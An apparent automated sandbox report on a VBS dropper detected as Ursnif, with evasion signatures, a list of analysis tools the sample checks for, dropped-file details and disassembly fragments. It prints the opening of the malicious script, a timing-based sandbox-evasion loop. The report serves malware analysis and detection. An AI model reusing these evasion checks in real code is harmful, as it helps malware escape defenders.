                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                Found evasive API chain (may stop execution after checking system information)
                Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleepgraph_23-16243
                Source: C:\Windows\System32\wscript.exe TID: 7144Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 375Jump to behavior
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7000EEA1 FindFirstFileExW,23_2_7000EEA1

                Anti Debugging

                barindex
                Found API chain indicative of debugger detection
                Source: C:\Windows\SysWOW64\rundll32.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_23-16243
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70002116 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_70002116
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_6FFA1A0A LoadLibraryA,GetProcAddress,23_2_6FFA1A0A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_700081A6 mov eax, dword ptr fs:[00000030h]23_2_700081A6
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7000EB9A mov eax, dword ptr fs:[00000030h]23_2_7000EB9A
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7004A96D mov eax, dword ptr fs:[00000030h]23_2_7004A96D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7004A89C mov eax, dword ptr fs:[00000030h]23_2_7004A89C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_7004A4A3 push dword ptr fs:[00000030h]23_2_7004A4A3
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServerJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70002116 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_70002116
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70001E38 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_70001E38
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_70006707 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_70006707

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Benign windows process drops PE files
                Source: C:\Windows\System32\wscript.exeFile created: melange.yuv.0.drJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,23_2_6FFA11BF
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,23_2_70009925
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,23_2_7001234F
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,23_2_70011BC3
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,23_2_70012524
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,23_2_70009E09
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,23_2_70011E65
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,23_2_70011EB0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,23_2_70011F4B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_700022EB cpuid 23_2_700022EB
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_6FFA10ED GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,23_2_6FFA10ED
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 23_2_6FFA1F7C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,23_2_6FFA1F7C
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procmon.exe
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tcpview.exe
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wireshark.exe
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avz.exe
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cports.exe
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lordpe.exe
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: icesword.exe
                Source: wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autoruns.exe
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741682153.00000274C5538000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ollydbg.exe
                Source: wscript.exe, 00000000.00000003.741553420.00000274C5515000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.741282156.00000274C5514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regshot.exe

                Stealing of Sensitive Information

                barindex
                Yara detected Ursnif
                Source: Yara matchFile source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected Ursnif
                Source: Yara matchFile source: 23.2.rundll32.exe.2ca0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.3.rundll32.exe.4638d0f.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.rundll32.exe.4b694a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.rundll32.exe.6ffa0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 23.2.rundll32.exe.4b694a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts121
                Windows Management Instrumentation                		Path Interception1
                Process Injection                		1
                Masquerading                		OS Credential Dumping1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		Exfiltration Over Other Network Medium1
                Encrypted Channel                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts121
                Scripting                		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts13
                Virtualization/Sandbox Evasion                		LSASS Memory1
                Query Registry                		Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts11
                Native API                		Logon Script (Windows)Logon Script (Windows)1
                Disable or Modify Tools                		Security Account Manager24
                Security Software Discovery                		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local Accounts1
                Exploitation for Client Execution                		Logon Script (Mac)Logon Script (Mac)1
                Process Injection                		NTDS13
                Virtualization/Sandbox Evasion                		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Application Window Discovery                		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common121
                Scripting                		Cached Domain Credentials1
                File and Directory Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items3
                Obfuscated Files or Information                		DCSync135
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                Rundll32                		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                File Deletion                		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                gnAYDP69br2v.vbs0%MetadefenderBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\melange.yuv100%AviraTR/AD.UrsnifDropper.vsbvn

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                23.2.rundll32.exe.2ca0000.0.unpack100%AviraHEUR/AGEN.1108158Download File
                23.2.rundll32.exe.6ffa0000.2.unpack100%AviraHEUR/AGEN.1210012Download File

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                World Map of Contacted IPs

                No contacted IP infos

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:560537
                Start date:26.01.2022
                Start time:16:57:03
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 8m 37s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:gnAYDP69br2v.vbs
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:24
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.evad.winVBS@6/2@0/0
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 3.8% (good quality ratio 3.6%)
                • Quality average: 80.3%
                • Quality standard deviation: 27.6%
                HCA Information:
                • Successful, ratio: 96%
                • Number of executed functions: 18
                • Number of non-executed functions: 49
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .vbs
                • Override analysis time to 240s for JS/VBS files not yet terminated

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                • Excluded IPs from analysis (whitelisted): 23.211.6.115
                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                17:01:07API Interceptor1x Sleep call for process: wscript.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Temp\adobe.url

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):108
                Entropy (8bit):4.699454908123665
                Encrypted:false
                SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
                MD5:99D9EE4F5137B94435D9BF49726E3D7B
                SHA1:4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
                SHA-256:F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
                SHA-512:7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..

                C:\Users\user\AppData\Local\Temp\melange.yuv

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):696320
                Entropy (8bit):6.7012968874378664
                Encrypted:false
                SSDEEP:12288:TOgVktK4arTQrNn4iq0hS7M+M8uFKLrseaCoZSSi7Pq6b4bi:agWtja/QrNn4iqJY8v3sen1Dq3bi
                MD5:E999967D5B4EFD08C2C7FCCE637BC8AA
                SHA1:53B18ED4427ACFE90A6D8B7119942CCE7159B567
                SHA-256:8CD975F66D825DD37B06EF0465D160C65301726CC2A4BDFAD2EAFBAC14536F74
                SHA-512:95B12CAA57C273B6A059FE7E30D451FA447B100851B8C078EEB8E54AC5DB063E7565BCA72A7941BF7393E4E5526279709B586FE9B5F840D1B9B19BB611B1E4FB
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................*L.......z.............~......|......{.......z....*L........~......q.....................}.....Rich............PE..L......W...........!.....X...................p......................................i.....@..........................a..l....a..P............................p...3...8..T............................9..@............p..(............................text....W.......X.................. ..`.rdata.......p.......\..............@..@.data...,....p.......\..............@....gfids.......`.......j..............@..@.reloc...3...p...4...l..............@..B................................................................................................................................................................................................................................................................................................

                Static File Info

                General

                File type:ASCII text, with very long lines, with CRLF line terminators
                Entropy (8bit):4.767477149162963
                TrID:
                  File name:gnAYDP69br2v.vbs
                  File size:2488066
                  MD5:694a1a5ee37e5c161a37d4166a677850
                  SHA1:adfdbca254f8f810735cf2224aca1630af762bea
                  SHA256:0993c606df923ac8f174d7789fb494633c89d99d48747a91b866dc410cbd5814
                  SHA512:ea02fa36914d4013e3b7323acf97a69535ecb06b72dba1806a9d4eadc03b19e43063d1ee7bf4c86b0fc3a944c9f240e1bb1cd3674e437ec9f3fb403c7f60e324
                  SSDEEP:24576:cLx+U9YLFB1Dt2W5P6T8qd76yeD53H9cjnQG8m/cizoANcvc/ZoTnqo/7aU:+RHQG8KqANnK
                  File Content Preview:UISA = Timer()..For Ysdhh = 1 to 7..WScript.Sleep 1000:..Next..ASDQWE = Timer()..if ASDQWE - UISA < 5 Then..Do: Asrtd = 4: Loop..End if..const oL = 78..const iH = 95..' provenance denunciate. priggish, maxim Polyphemus lymphoma conscience Becky Gruyere do

                  File Icon

                  Icon Hash:e8d69ece869a9ec4

                  Network Behavior

                  No network behavior found

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:16:58:08
                  Start date:26/01/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\gnAYDP69br2v.vbs"
                  Imagebase:0x7ff6ebb80000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:21
                  Start time:17:01:06
                  Start date:26/01/2022
                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Imagebase:0x7ff7e33a0000
                  File size:488448 bytes
                  MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Target ID:22
                  Start time:17:01:06
                  Start date:26/01/2022
                  Path:C:\Windows\System32\rundll32.exe
                  Wow64 process (32bit):false
                  Commandline:rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
                  Imagebase:0x7ff7e5740000
                  File size:69632 bytes
                  MD5 hash:73C519F050C20580F8A62C849D49215A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:23
                  Start time:17:01:07
                  Start date:26/01/2022
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32 C:\Users\user\AppData\Local\Temp\melange.yuv,DllRegisterServer
                  Imagebase:0x250000
                  File size:61952 bytes
                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000017.00000002.882183834.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000017.00000003.870417706.0000000004630000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:4.7%
                    Dynamic/Decrypted Code Coverage:12%
                    Signature Coverage:7.4%
                    Total number of Nodes:1303
                    Total number of Limit Nodes:46
                    execution_graph 17573 7000aa81 17576 7000a74d 17573->17576 17577 7000a759 ___FrameUnwindToState 17576->17577 17584 70006cec RtlEnterCriticalSection 17577->17584 17579 7000a791 17585 7000a7af 17579->17585 17581 7000a763 17581->17579 17583 70010435 __Getctype 14 API calls 17581->17583 17583->17581 17584->17581 17588 70006d34 RtlLeaveCriticalSection 17585->17588 17587 7000a79d 17588->17587 17052 70010e08 17081 7000aa16 17052->17081 17054 7000a156 40 API calls 17055 70010e2c 17054->17055 17055->17054 17057 70010ede 17055->17057 17056 7000a156 40 API calls 17056->17057 17057->17056 17058 70010f67 17057->17058 17090 7000a156 17058->17090 17061 7000a156 40 API calls 17062 70010f96 17061->17062 17063 7000a156 40 API calls 17062->17063 17064 70010fad 17063->17064 17065 7000a156 40 API calls 17064->17065 17066 70010fc4 17065->17066 17067 7000a156 40 API calls 17066->17067 17068 70010fde 17067->17068 17069 7000a156 40 API calls 17068->17069 17070 70010ff5 17069->17070 17071 7000a156 40 API calls 17070->17071 17072 7001100f 17071->17072 17073 7000a156 40 API calls 17072->17073 17074 70011029 17073->17074 17075 7000a156 40 API calls 17074->17075 17076 70011043 17075->17076 17077 7000a156 40 API calls 17076->17077 17078 7001105a 17077->17078 17079 7000a156 40 API calls 17078->17079 17080 70011074 17079->17080 17082 7000aa23 ___crtCompareStringW 17081->17082 17087 7000aa5f 17081->17087 17083 70007520 __Wcsxfrm 15 API calls 17082->17083 17082->17087 17084 7000aa43 17083->17084 17084->17087 17125 70011415 17084->17125 17086 7000aa58 17086->17087 17132 700068e0 IsProcessorFeaturePresent 17086->17132 17087->17055 17089 7000aa75 17091 7000a193 17090->17091 17092 7000a275 17090->17092 17142 7000a077 17091->17142 17093 7000a2b6 17092->17093 17094 7000a27a 17092->17094 17101 70009e09 std::_Locinfo::_Locinfo_ctor 6 API calls 17093->17101 17105 7000a1f5 17093->17105 17164 70009e09 17094->17164 17099 7000a1b6 17104 70007341 __Getctype 14 API calls 17099->17104 17100 7000a1fc GetLastError 17103 7000a20b 17100->17103 17100->17105 17101->17105 17102 70001592 ctype 4 API calls 17106 7000a2f9 17102->17106 17107 7000a077 36 API calls 17103->17107 17109 7000a1be 17104->17109 17105->17102 17106->17061 17110 7000a21c 17107->17110 17108 70007341 __Getctype 14 API calls 17113 7000a297 17108->17113 17111 700074e6 _free 14 API calls 17109->17111 17110->17105 17115 70007341 __Getctype 14 API calls 17110->17115 17114 7000a1c6 17111->17114 17112 7000a258 17117 700074e6 _free 14 API calls 17112->17117 17113->17112 17116 70009e09 std::_Locinfo::_Locinfo_ctor 6 API calls 17113->17116 17114->17105 17157 70010698 17114->17157 17118 7000a235 17115->17118 17116->17112 17117->17105 17118->17112 17122 7000a077 36 API calls 17118->17122 17120 7000a1ea 17120->17105 17121 7000a2fb 17120->17121 17123 700068e0 __Getctype 10 API calls 17121->17123 17122->17112 17124 7000a305 17123->17124 17126 7001134a 17125->17126 17127 70011362 17126->17127 17128 7001136c __cftoe 17126->17128 17130 7001139f 17126->17130 17127->17128 17129 70006ddb __Wcscoll 14 API calls 17127->17129 17128->17086 17129->17128 17130->17128 17131 70006ddb __Wcscoll 14 API calls 17130->17131 17131->17128 17133 700068ec 17132->17133 17136 70006707 17133->17136 17137 70006723 _Atexit ___scrt_fastfail 17136->17137 17138 7000674f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17137->17138 17141 70006820 _Atexit 17138->17141 17139 70001592 ctype 4 API calls 17140 7000683e GetCurrentProcess TerminateProcess 17139->17140 17140->17089 17141->17139 17170 700073c2 17142->17170 17145 70009e09 std::_Locinfo::_Locinfo_ctor 6 API calls 17147 7000a0af 17145->17147 17146 7000a131 17148 70001592 ctype 4 API calls 17146->17148 17147->17146 17150 70007520 __Wcsxfrm 15 API calls 17147->17150 17154 7000a0ca std::_Locinfo::_Locinfo_ctor 17147->17154 17151 7000a154 17148->17151 17149 7000a126 17181 70000e81 17149->17181 17150->17154 17151->17099 17151->17100 17152 70009e09 std::_Locinfo::_Locinfo_ctor 6 API calls 17155 7000a108 17152->17155 17154->17149 17154->17152 17155->17149 17178 7000e90b 17155->17178 17158 700105e5 17157->17158 17160 70010607 __cftoe 17158->17160 17161 700105fd 17158->17161 17162 70010635 17158->17162 17159 70006ddb __Wcscoll 14 API calls 17159->17160 17160->17120 17161->17159 17161->17160 17162->17160 17163 70006ddb __Wcscoll 14 API calls 17162->17163 17163->17160 17379 70009a57 17164->17379 17168 70009e23 17168->17105 17168->17108 17169 70009e3c GetLocaleInfoW 17169->17168 17171 700073e2 17170->17171 17177 700073d9 17170->17177 17171->17177 17185 700096c6 GetLastError 17171->17185 17177->17145 17179 7000e924 WideCharToMultiByte 17178->17179 17179->17149 17182 70000e8b 17181->17182 17183 70000e9c 17181->17183 17182->17183 17184 700074e6 _free 14 API calls 17182->17184 17183->17146 17184->17183 17186 700096e3 17185->17186 17187 700096dd 17185->17187 17188 70009dc7 _Atexit 6 API calls 17186->17188 17211 700096e9 SetLastError 17186->17211 17189 70009d88 _Atexit 6 API calls 17187->17189 17190 70009701 17188->17190 17189->17186 17191 70007341 __Getctype 14 API calls 17190->17191 17190->17211 17193 70009711 17191->17193 17194 70009730 17193->17194 17195 70009719 17193->17195 17200 70009dc7 _Atexit 6 API calls 17194->17200 17198 70009dc7 _Atexit 6 API calls 17195->17198 17196 70007402 17212 7000a63c 17196->17212 17197 7000977d 17220 70007827 17197->17220 17202 70009727 17198->17202 17201 7000973c 17200->17201 17204 70009740 17201->17204 17205 70009751 17201->17205 17208 700074e6 _free 14 API calls 17202->17208 17206 70009dc7 _Atexit 6 API calls 17204->17206 17207 700094c8 _Atexit 14 API calls 17205->17207 17206->17202 17209 7000975c 17207->17209 17208->17211 17210 700074e6 _free 14 API calls 17209->17210 17210->17211 17211->17196 17211->17197 17213 70007418 17212->17213 17214 7000a64f 17212->17214 17216 7000a669 17213->17216 17214->17213 17336 700103b4 17214->17336 17217 7000a67c 17216->17217 17219 7000a691 17216->17219 17217->17219 17358 7000f99e 17217->17358 17219->17177 17231 7000c488 17220->17231 17224 70007841 IsProcessorFeaturePresent 17227 7000784d 17224->17227 17225 70007860 17259 7000829c 17225->17259 17226 70007837 17226->17224 17226->17225 17229 70006707 _Atexit 7 API calls 17227->17229 17229->17225 17262 7000c3ba 17231->17262 17234 7000c4d6 17235 7000c4e2 ___FrameUnwindToState 17234->17235 17236 7000981d _Atexit 14 API calls 17235->17236 17239 7000c50f _Atexit 17235->17239 17241 7000c509 _Atexit 17235->17241 17236->17241 17237 7000c554 17238 70006ddb __Wcscoll 14 API calls 17237->17238 17240 7000c53e __cftoe 17238->17240 17243 7000c580 17239->17243 17273 70006cec RtlEnterCriticalSection 17239->17273 17240->17226 17241->17237 17241->17239 17241->17240 17245 7000c5c8 17243->17245 17246 7000c6bd 17243->17246 17256 7000c5f3 17243->17256 17245->17256 17274 7000c4cd 17245->17274 17247 7000c6c8 17246->17247 17281 70006d34 RtlLeaveCriticalSection 17246->17281 17250 7000829c _Atexit 23 API calls 17247->17250 17251 7000c6d0 17250->17251 17254 700096c6 __Getctype 33 API calls 17257 7000c647 17254->17257 17255 7000c4cd _Atexit 33 API calls 17255->17256 17277 7000c669 17256->17277 17257->17240 17258 700096c6 __Getctype 33 API calls 17257->17258 17258->17240 17283 70008142 17259->17283 17263 7000c3c6 ___FrameUnwindToState 17262->17263 17268 70006cec RtlEnterCriticalSection 17263->17268 17265 7000c3d4 17269 7000c412 17265->17269 17268->17265 17272 70006d34 RtlLeaveCriticalSection 17269->17272 17271 7000782c 17271->17226 17271->17234 17272->17271 17273->17243 17275 700096c6 __Getctype 33 API calls 17274->17275 17276 7000c4d2 17275->17276 17276->17255 17278 7000c638 17277->17278 17279 7000c66f 17277->17279 17278->17240 17278->17254 17278->17257 17282 70006d34 RtlLeaveCriticalSection 17279->17282 17281->17247 17282->17278 17284 70008150 17283->17284 17292 70008161 17283->17292 17294 700081e8 GetModuleHandleW 17284->17294 17287 7000786a 